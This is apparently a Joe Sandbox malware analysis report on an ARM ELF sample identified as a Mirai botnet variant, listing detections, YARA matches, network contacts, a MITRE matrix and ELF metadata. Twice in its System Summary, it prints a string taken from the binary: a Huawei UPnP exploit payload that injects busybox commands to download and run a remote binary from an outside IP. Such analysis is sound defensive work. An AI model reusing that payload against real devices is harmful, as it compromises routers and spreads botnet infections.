Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
meth12.elf

Overview

General Information

Sample name:meth12.elf
Analysis ID:1590756
MD5:8a75b245b02efd9ab6e3f0d81d88d2f0
SHA1:272e023192d3c774d97a777f2b15fe4f2132a5e8
SHA256:4f781f571c8eb7847f42cc19d387194f97f5ad2d3701b19aad480c422e290cad
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:92
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
Contains symbols with names commonly found in malware
Sample and/or dropped files contains symbols with suspicious names
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1590756
Start date and time:2025-01-14 15:53:08 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 10m 37s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:meth12.elf
Detection:MAL
Classification:mal92.troj.linELF@0/0@0/0
Cookbook Comments:
  • Analysis time extended to 480s due to sleep detection in submitted sample
Command:/tmp/meth12.elf
PID:6238
Exit Code:255
Exit Code Info:
Killed:False
Standard Output:

Standard Error:/lib/ld-uClibc.so.0: No such file or directory
  • system is lnxubuntu20
  • meth12.elf (PID: 6238, Parent: 6159, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/meth12.elf
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
meth12.elfJoeSecurity_Mirai_9Yara detected MiraiJoe Security
    meth12.elfJoeSecurity_Mirai_6Yara detected MiraiJoe Security
      meth12.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
        meth12.elfLinux_Trojan_Mirai_0bce98a2unknownunknown
        • 0x980c:$a: 4B 52 41 00 46 47 44 43 57 4E 56 00 48 57 43 4C 56 47 41 4A
        meth12.elfMirai_Botnet_MalwareDetects Mirai Botnet MalwareFlorian Roth
        • 0x97b0:$x2: /dev/misc/watchdog
        • 0x97a0:$x3: /dev/watchdog
        • 0x9818:$s5: HWCLVGAJ
        SourceRuleDescriptionAuthorStrings
        6238.1.00007f2a40028000.00007f2a40029000.rw-.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
          6238.1.00007f2a40028000.00007f2a40029000.rw-.sdmpLinux_Trojan_Mirai_0bce98a2unknownunknown
          • 0x80c:$a: 4B 52 41 00 46 47 44 43 57 4E 56 00 48 57 43 4C 56 47 41 4A
          6238.1.00007f2a40017000.00007f2a40021000.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
            6238.1.00007f2a40017000.00007f2a40021000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
              6238.1.00007f2a40017000.00007f2a40021000.r-x.sdmpLinux_Trojan_Mirai_0bce98a2unknownunknown
              • 0x980c:$a: 4B 52 41 00 46 47 44 43 57 4E 56 00 48 57 43 4C 56 47 41 4A
              Click to see the 2 entries
              No Suricata rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: meth12.elfAvira: detected
              Source: meth12.elfReversingLabs: Detection: 55%
              Source: meth12.elfVirustotal: Detection: 46%Perma Link
              Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
              Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
              Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
              Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
              Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
              Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
              Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
              Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
              Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
              Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
              Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
              Source: meth12.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: meth12.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
              Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443

              System Summary

              barindex
              Source: meth12.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_0bce98a2 Author: unknown
              Source: meth12.elf, type: SAMPLEMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
              Source: 6238.1.00007f2a40028000.00007f2a40029000.rw-.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0bce98a2 Author: unknown
              Source: 6238.1.00007f2a40017000.00007f2a40021000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0bce98a2 Author: unknown
              Source: 6238.1.00007f2a40017000.00007f2a40021000.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
              Source: ELF static info symbol of initial sampleName: attack.c
              Source: ELF static info symbol of initial sampleName: attack_get_opt_int
              Source: ELF static info symbol of initial sampleName: attack_get_opt_ip
              Source: ELF static info symbol of initial sampleName: attack_gre.c
              Source: ELF static info symbol of initial sampleName: attack_gre_eth
              Source: ELF static info symbol of initial sampleName: attack_gre_ip
              Source: ELF static info symbol of initial sampleName: attack_init
              Source: ELF static info symbol of initial sampleName: attack_kill_all
              Source: ELF static info symbol of initial sampleName: attack_ongoing
              Source: ELF static info symbol of initial sampleName: attack_parse
              Source: meth12.elfELF static info symbol of initial sample: huawei_scanner_pid
              Source: meth12.elfELF static info symbol of initial sample: huawei_scanner_rawpkt
              Source: meth12.elfELF static info symbol of initial sample: scanner.c
              Source: meth12.elfELF static info symbol of initial sample: scanner_init
              Source: meth12.elfELF static info symbol of initial sample: scanner_pid
              Source: meth12.elfELF static info symbol of initial sample: scanner_rawpkt
              Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 193.233.193.12 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 193.233.193.12 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
              Source: meth12.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_0bce98a2 reference_sample = 1b20df8df7f84ad29d81ccbe276f49a6488c2214077b13da858656c027531c80, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 993d0d2e24152d0fb72cc5d5add395bed26671c3935f73386341398b91cb0e6e, id = 0bce98a2-113e-41e1-95c9-9e1852b26142, last_modified = 2021-09-16
              Source: meth12.elf, type: SAMPLEMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
              Source: 6238.1.00007f2a40028000.00007f2a40029000.rw-.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0bce98a2 reference_sample = 1b20df8df7f84ad29d81ccbe276f49a6488c2214077b13da858656c027531c80, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 993d0d2e24152d0fb72cc5d5add395bed26671c3935f73386341398b91cb0e6e, id = 0bce98a2-113e-41e1-95c9-9e1852b26142, last_modified = 2021-09-16
              Source: 6238.1.00007f2a40017000.00007f2a40021000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0bce98a2 reference_sample = 1b20df8df7f84ad29d81ccbe276f49a6488c2214077b13da858656c027531c80, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 993d0d2e24152d0fb72cc5d5add395bed26671c3935f73386341398b91cb0e6e, id = 0bce98a2-113e-41e1-95c9-9e1852b26142, last_modified = 2021-09-16
              Source: 6238.1.00007f2a40017000.00007f2a40021000.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
              Source: classification engineClassification label: mal92.troj.linELF@0/0@0/0
              Source: /tmp/meth12.elf (PID: 6238)Queries kernel information via 'uname': Jump to behavior
              Source: meth12.elf, 6238.1.000055b2f4e9b000.000055b2f4fc9000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/arm
              Source: meth12.elf, 6238.1.00007ffd2cd9f000.00007ffd2cdc0000.rw-.sdmpBinary or memory string: qemu: %s: %s
              Source: meth12.elf, 6238.1.00007ffd2cd9f000.00007ffd2cdc0000.rw-.sdmpBinary or memory string: leqemu: %s: %s
              Source: meth12.elf, 6238.1.000055b2f4e9b000.000055b2f4fc9000.rw-.sdmpBinary or memory string: Urg.qemu.gdb.arm.sys.regs">
              Source: meth12.elf, 6238.1.000055b2f4e9b000.000055b2f4fc9000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
              Source: meth12.elf, 6238.1.00007ffd2cd9f000.00007ffd2cdc0000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
              Source: meth12.elf, 6238.1.00007ffd2cd9f000.00007ffd2cdc0000.rw-.sdmpBinary or memory string: /x86_64/usr/bin/qemu-arm/tmp/meth12.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/meth12.elf
              Source: meth12.elf, 6238.1.000055b2f4e9b000.000055b2f4fc9000.rw-.sdmpBinary or memory string: rg.qemu.gdb.arm.sys.regs">

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: meth12.elf, type: SAMPLE
              Source: Yara matchFile source: 6238.1.00007f2a40028000.00007f2a40029000.rw-.sdmp, type: MEMORY
              Source: Yara matchFile source: 6238.1.00007f2a40017000.00007f2a40021000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: meth12.elf PID: 6238, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: meth12.elf, type: SAMPLE
              Source: Yara matchFile source: 6238.1.00007f2a40028000.00007f2a40029000.rw-.sdmp, type: MEMORY
              Source: Yara matchFile source: 6238.1.00007f2a40017000.00007f2a40021000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: meth12.elf PID: 6238, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath InterceptionPath Interception1
              Masquerading
              OS Credential Dumping11
              Security Software Discovery
              Remote ServicesData from Local System1
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
              Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              No configs have been found

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              meth12.elf55%ReversingLabsLinux.Trojan.Mirai
              meth12.elf46%VirustotalBrowse
              meth12.elf100%AviraEXP/ELF.Gafgyt.X
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              No contacted domains info
              NameSourceMaliciousAntivirus DetectionReputation
              http://schemas.xmlsoap.org/soap/encoding/meth12.elffalse
                high
                http://schemas.xmlsoap.org/soap/envelope/meth12.elffalse
                  high
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  109.202.202.202
                  unknownSwitzerland
                  13030INIT7CHfalse
                  91.189.91.43
                  unknownUnited Kingdom
                  41231CANONICAL-ASGBfalse
                  91.189.91.42
                  unknownUnited Kingdom
                  41231CANONICAL-ASGBfalse
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                  • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                  91.189.91.43rebirth.ppc.elfGet hashmaliciousGafgytBrowse
                    x86_64.elfGet hashmaliciousMirai, MoobotBrowse
                      p-p.c-.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                        rebirth.arm5.elfGet hashmaliciousGafgytBrowse
                          Aqua.i686.elfGet hashmaliciousUnknownBrowse
                            na.elfGet hashmaliciousPrometeiBrowse
                              na.elfGet hashmaliciousPrometeiBrowse
                                na.elfGet hashmaliciousPrometeiBrowse
                                  na.elfGet hashmaliciousPrometeiBrowse
                                    sshd.elfGet hashmaliciousUnknownBrowse
                                      91.189.91.42rebirth.ppc.elfGet hashmaliciousGafgytBrowse
                                        x86_64.elfGet hashmaliciousMirai, MoobotBrowse
                                          p-p.c-.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                            rebirth.arm5.elfGet hashmaliciousGafgytBrowse
                                              Aqua.i686.elfGet hashmaliciousUnknownBrowse
                                                na.elfGet hashmaliciousPrometeiBrowse
                                                  na.elfGet hashmaliciousPrometeiBrowse
                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                        sshd.elfGet hashmaliciousUnknownBrowse
                                                          No context
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          CANONICAL-ASGBm68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 185.125.190.26
                                                          x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 185.125.190.26
                                                          rebirth.ppc.elfGet hashmaliciousGafgytBrowse
                                                          • 91.189.91.42
                                                          x86_64.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 91.189.91.42
                                                          p-p.c-.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                          • 91.189.91.42
                                                          rebirth.mips.elfGet hashmaliciousGafgytBrowse
                                                          • 185.125.190.26
                                                          rebirth.arm5.elfGet hashmaliciousGafgytBrowse
                                                          • 91.189.91.42
                                                          rebirth.x86.elfGet hashmaliciousGafgytBrowse
                                                          • 185.125.190.26
                                                          Aqua.i686.elfGet hashmaliciousUnknownBrowse
                                                          • 91.189.91.42
                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                          • 91.189.91.42
                                                          CANONICAL-ASGBm68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 185.125.190.26
                                                          x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 185.125.190.26
                                                          rebirth.ppc.elfGet hashmaliciousGafgytBrowse
                                                          • 91.189.91.42
                                                          x86_64.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 91.189.91.42
                                                          p-p.c-.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                          • 91.189.91.42
                                                          rebirth.mips.elfGet hashmaliciousGafgytBrowse
                                                          • 185.125.190.26
                                                          rebirth.arm5.elfGet hashmaliciousGafgytBrowse
                                                          • 91.189.91.42
                                                          rebirth.x86.elfGet hashmaliciousGafgytBrowse
                                                          • 185.125.190.26
                                                          Aqua.i686.elfGet hashmaliciousUnknownBrowse
                                                          • 91.189.91.42
                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                          • 91.189.91.42
                                                          INIT7CHrebirth.ppc.elfGet hashmaliciousGafgytBrowse
                                                          • 109.202.202.202
                                                          x86_64.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 109.202.202.202
                                                          p-p.c-.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                          • 109.202.202.202
                                                          rebirth.arm5.elfGet hashmaliciousGafgytBrowse
                                                          • 109.202.202.202
                                                          Aqua.i686.elfGet hashmaliciousUnknownBrowse
                                                          • 109.202.202.202
                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                          • 109.202.202.202
                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                          • 109.202.202.202
                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                          • 109.202.202.202
                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                          • 109.202.202.202
                                                          sshd.elfGet hashmaliciousUnknownBrowse
                                                          • 109.202.202.202
                                                          No context
                                                          No context
                                                          No created / dropped files found
                                                          File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, with debug_info, not stripped
                                                          Entropy (8bit):5.9940950766110666
                                                          TrID:
                                                          • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                          File name:meth12.elf
                                                          File size:49'682 bytes
                                                          MD5:8a75b245b02efd9ab6e3f0d81d88d2f0
                                                          SHA1:272e023192d3c774d97a777f2b15fe4f2132a5e8
                                                          SHA256:4f781f571c8eb7847f42cc19d387194f97f5ad2d3701b19aad480c422e290cad
                                                          SHA512:7037a196da02bd63dedddb8049d9bbbffb11b4ba644fc0d0fd3f4be3a2e9605e8faa3cf2a6f67ed193ca78618e4edcb5c25091bd94aeba8c42f11d24dcd38287
                                                          SSDEEP:768:zVhM588UDLnDdeSxM3cXxF1L9Sgv9FlqBG4XTJW/RBWHXVDAQMKyPTnsckLzcI3a:jM5ILtxMgLJVmdTJMWi9TsckLz9K
                                                          TLSH:EB2319857CC28E1AC5D412BABB7F02E9331163A8D2CF7313D4149B587E8A52E4F67B85
                                                          File Content Preview:.ELF..............(.........4...........4. ...(.........4...4...4.......................................................................................................\...........................................Q.td............................/lib/ld-uCl

                                                          ELF header

                                                          Class:ELF32
                                                          Data:2's complement, little endian
                                                          Version:1 (current)
                                                          Machine:ARM
                                                          Version Number:0x1
                                                          Type:EXEC (Executable file)
                                                          OS/ABI:UNIX - System V
                                                          ABI Version:0
                                                          Entry Point Address:0x8df8
                                                          Flags:0x4000002
                                                          ELF Header Size:52
                                                          Program Header Offset:52
                                                          Program Header Size:32
                                                          Number of Program Headers:6
                                                          Section Header Offset:41496
                                                          Section Header Size:40
                                                          Number of Section Headers:29
                                                          Header String Table Index:26
                                                          NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                          NULL0x00x00x00x00x0000
                                                          .interpPROGBITS0x80f40xf40x140x00x2A001
                                                          .hashHASH0x81080x1080x2240x40x2A304
                                                          .dynsymDYNSYM0x832c0x32c0x4400x100x2A414
                                                          .dynstrSTRTAB0x876c0x76c0x1fd0x00x2A001
                                                          .rel.pltREL0x896c0x96c0x1a00x80x2A374
                                                          .initPROGBITS0x8b0c0xb0c0x100x00x6AX004
                                                          .pltPROGBITS0x8b1c0xb1c0x2840x40x6AX004
                                                          .textPROGBITS0x8da00xda00x86b40x00x6AX004
                                                          .finiPROGBITS0x114540x94540x100x00x6AX004
                                                          .rodataPROGBITS0x114640x94640x5a40x00x2A004
                                                          .eh_framePROGBITS0x19a080x9a080x40x00x3WA004
                                                          .init_arrayINIT_ARRAY0x19a0c0x9a0c0x40x00x3WA004
                                                          .fini_arrayFINI_ARRAY0x19a100x9a100x40x00x3WA004
                                                          .jcrPROGBITS0x19a140x9a140x40x00x3WA004
                                                          .dynamicDYNAMIC0x19a180x9a180xb80x80x3WA404
                                                          .gotPROGBITS0x19ad00x9ad00xdc0x40x3WA004
                                                          .dataPROGBITS0x19bac0x9bac0x600x00x3WA004
                                                          .bssNOBITS0x19c0c0x9c0c0x1580x00x3WA004
                                                          .commentPROGBITS0x00x9c0c0x1900x00x0001
                                                          .debug_arangesPROGBITS0x00x9da00x400x00x0008
                                                          .debug_infoPROGBITS0x00x9de00x1920x00x0001
                                                          .debug_abbrevPROGBITS0x00x9f720x280x00x0001
                                                          .debug_linePROGBITS0x00x9f9a0x1420x00x0001
                                                          .debug_framePROGBITS0x00xa0dc0x2c0x00x0004
                                                          .ARM.attributesARM_ATTRIBUTES0x00xa1080x160x00x0001
                                                          .shstrtabSTRTAB0x00xa11e0xf70x00x0001
                                                          .symtabSYMTAB0x00xa6a00x13900x100x0281714
                                                          .strtabSTRTAB0x00xba300x7e20x00x0001
                                                          TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                          PHDR0x340x80340x80340xc00xc02.23940x5R E0x4
                                                          INTERP0xf40x80f40x80f40x140x143.68420x4R 0x1/lib/ld-uClibc.so.0.interp
                                                          LOAD0x00x80000x80000x9a080x9a086.12250x5R E0x8000.interp .hash .dynsym .dynstr .rel.plt .init .plt .text .fini .rodata
                                                          LOAD0x9a080x19a080x19a080x2040x35c3.38640x6RW 0x8000.eh_frame .init_array .fini_array .jcr .dynamic .got .data .bss
                                                          DYNAMIC0x9a180x19a180x19a180xb80xb82.05310x6RW 0x4.dynamic
                                                          GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                                          TypeMetaValueTag
                                                          DT_NEEDEDsharedliblibc.so.00x1
                                                          DT_INITvalue0x8b0c0xc
                                                          DT_FINIvalue0x114540xd
                                                          DT_INIT_ARRAYvalue0x19a0c0x19
                                                          DT_INIT_ARRAYSZbytes40x1b
                                                          DT_FINI_ARRAYvalue0x19a100x1a
                                                          DT_FINI_ARRAYSZbytes40x1c
                                                          DT_HASHvalue0x81080x4
                                                          DT_STRTABvalue0x876c0x5
                                                          DT_SYMTABvalue0x832c0x6
                                                          DT_STRSZbytes5090xa
                                                          DT_SYMENTbytes160xb
                                                          DT_DEBUGvalue0x00x15
                                                          DT_PLTGOTvalue0x19ad00x3
                                                          DT_PLTRELSZbytes4160x2
                                                          DT_PLTRELpltrelDT_REL0x14
                                                          DT_JMPRELvalue0x896c0x17
                                                          DT_NULLvalue0x00x0
                                                          NameVersion Info NameVersion Info File NameSection NameValueSizeSymbol TypeSymbol BindSymbol VisibilityNdx
                                                          .dynsym0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                          __bss_end__.dynsym0x19d640NOTYPE<unknown>DEFAULTSHN_ABS
                                                          __bss_start.dynsym0x19c0c0NOTYPE<unknown>DEFAULTSHN_ABS
                                                          __bss_start__.dynsym0x19c0c0NOTYPE<unknown>DEFAULTSHN_ABS
                                                          __data_start.dynsym0x19bac0NOTYPE<unknown>DEFAULT17
                                                          __end__.dynsym0x19d640NOTYPE<unknown>DEFAULTSHN_ABS
                                                          __errno_location.dynsym0x8d1032FUNC<unknown>DEFAULTSHN_UNDEF
                                                          __exidx_end.dynsym0x11a080NOTYPE<unknown>DEFAULTSHN_ABS
                                                          __exidx_start.dynsym0x11a080NOTYPE<unknown>DEFAULTSHN_ABS
                                                          __uClibc_main.dynsym0x8cbc848FUNC<unknown>DEFAULTSHN_UNDEF
                                                          _bss_end__.dynsym0x19d640NOTYPE<unknown>DEFAULTSHN_ABS
                                                          _edata.dynsym0x19c0c0NOTYPE<unknown>DEFAULTSHN_ABS
                                                          _end.dynsym0x19d640NOTYPE<unknown>DEFAULTSHN_ABS
                                                          _start.dynsym0x8df880FUNC<unknown>DEFAULT8
                                                          abort.dynsym0x8bfc296FUNC<unknown>DEFAULTSHN_UNDEF
                                                          accept.dynsym0x8c08116FUNC<unknown>DEFAULTSHN_UNDEF
                                                          atoi.dynsym0x032FUNC<unknown>DEFAULTSHN_UNDEF
                                                          bind.dynsym0x8c3868FUNC<unknown>DEFAULTSHN_UNDEF
                                                          calloc.dynsym0x8c14320FUNC<unknown>DEFAULTSHN_UNDEF
                                                          chdir.dynsym0x8c5056FUNC<unknown>DEFAULTSHN_UNDEF
                                                          clock.dynsym0x8d3452FUNC<unknown>DEFAULTSHN_UNDEF
                                                          close.dynsym0x8d64100FUNC<unknown>DEFAULTSHN_UNDEF
                                                          closedir.dynsym0x8d4c272FUNC<unknown>DEFAULTSHN_UNDEF
                                                          connect.dynsym0x8b48116FUNC<unknown>DEFAULTSHN_UNDEF
                                                          exit.dynsym0x8d1c196FUNC<unknown>DEFAULTSHN_UNDEF
                                                          fcntl.dynsym0x8d58244FUNC<unknown>DEFAULTSHN_UNDEF
                                                          fork.dynsym0x8cb0972FUNC<unknown>DEFAULTSHN_UNDEF
                                                          free.dynsym0x8d7c572FUNC<unknown>DEFAULTSHN_UNDEF
                                                          getpid.dynsym0x8b6c72FUNC<unknown>DEFAULTSHN_UNDEF
                                                          getppid.dynsym0x8ce020FUNC<unknown>DEFAULTSHN_UNDEF
                                                          getsockname.dynsym0x8d9468FUNC<unknown>DEFAULTSHN_UNDEF
                                                          getsockopt.dynsym0x8d0472FUNC<unknown>DEFAULTSHN_UNDEF
                                                          inet_addr.dynsym0x8c4440FUNC<unknown>DEFAULTSHN_UNDEF
                                                          ioctl.dynsym0x8b30224FUNC<unknown>DEFAULTSHN_UNDEF
                                                          kill.dynsym0x8c2c56FUNC<unknown>DEFAULTSHN_UNDEF
                                                          listen.dynsym0x8ca464FUNC<unknown>DEFAULTSHN_UNDEF
